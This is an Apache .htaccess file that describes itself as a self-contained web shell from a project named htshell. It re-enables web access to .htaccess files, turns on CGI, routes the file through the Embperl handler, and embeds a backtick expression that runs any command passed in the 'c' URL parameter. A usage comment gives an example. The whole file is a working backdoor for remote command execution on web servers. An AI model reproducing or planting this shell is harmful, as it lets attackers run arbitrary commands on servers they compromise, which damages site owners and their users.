# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Run commands via http://url/.htaccess?c=cmd (ie: http://url/.htaccess?c=uname -a)

# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
</Files>

# Enable  CGI
Options +ExecCGI

#Make apache treat .htaccess as a cgi file
AddHandler perl-script .htaccess
PerlHandler Embperl

# SHELL
# [+ `$fdat{c}` +]
